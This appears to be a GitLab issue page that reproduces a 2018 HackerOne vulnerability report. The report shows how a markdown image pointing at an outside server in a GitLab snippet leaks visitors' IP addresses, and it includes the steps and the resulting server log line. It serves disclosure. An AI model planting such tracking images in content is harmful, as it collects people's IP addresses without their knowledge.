Skip to content

We steal the ip addresses of those who came to our snippet.

HackerOne report #457659 by iframe on 2018-12-06:

Hello, I found a vulnerability that allows stealing IP addresses of those who came to our snippet. Using a malicious image upload.

  1. Create snipe
  2. Insert the edit ! [test] (https://filecat.ru/xss/)
  3. Save

test.png

ping will come to my server:

[https://gitlab.com/] New view from <REDACTED IP> at Friday 7th of December 2018 00:14:37

Impact

We steal the ip addresses of those who came to our snippet.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

Security Issue

https://dev.gitlab.org/gitlab/gitlabhq/issues/2812

Edited by Jeremy Matos